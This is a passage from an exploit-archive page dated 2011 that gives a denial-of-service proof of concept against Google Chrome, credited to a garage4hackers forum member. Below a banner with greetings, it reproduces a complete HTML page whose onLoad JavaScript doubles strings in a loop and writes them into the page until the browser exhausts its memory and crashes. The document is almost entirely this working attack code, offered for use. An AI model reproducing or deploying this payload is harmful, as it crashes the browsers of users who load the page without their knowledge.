[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Google Chrome Denial Of Service (DoS)
# Published : 2011-10-23
# Author :
# Previous Title : Novell Netware XNFS.NLM NFS Rename Remote Code Execution
# Next Title : Soda PDF Professional 1.2.155 PDF/WWF File Handling DoS


/* 

         GGGGGG                                                   
	GG  __GG                                                  
	GG /  __| aaaaaa   rrrrrr  aaaaaa   gggggg   eeeeee  
	GG |GGGG  ____aa rr  __rr ____aa gg  __gg ee  __ee 
	GG |_GG | aaaaaaa |rr |  __|aaaaaaa |gg /  gg |eeeeeeee |
	GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
	GGGGGG  |aaaaaaa |rr |     aaaaaaa |ggggggg |eeeeeee 
 	 ______/  _______|__|      _______| ____gg | _______|
                                       	       gg   gg |          
                                       		gggggg  | 

Info-sec forum: http://garage4hackers.com

[+] Google Chrome Denial Of Service (DoS)

[+] Author: Prashant a.k.a t3rm!n4t0r

[+] C0ntact: happyterminator@gmail.com

[+] Platform: Windows, *nix

[+] Tested on: Windows Server 2003, XP SP2, Ubuntu 10.04

[+] Special Greets to: "vinnu" and secfence team

[+] Greets to: fb1h2s, b0nd, Eby, punter,godwin austin, the_empty, RD(Xer0), warrior, abhaythehero,d3c0d3r 

                      all hackers garage crew :)


*/


<html>
<title>DoS</title>
<head>
<script>
function Lox()
 {
 
    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");
     
    for(i=0; i <= 100 ; ++i) 
 {
        longunistring1+=longunistring1;
        longunistring2+=longunistring2;
        longunistring3+=longunistring3;
        longunistring4+=longunistring4;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
    }    
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
}
</script>
</head>
<body onLoad="Lox()">
</body>
</html>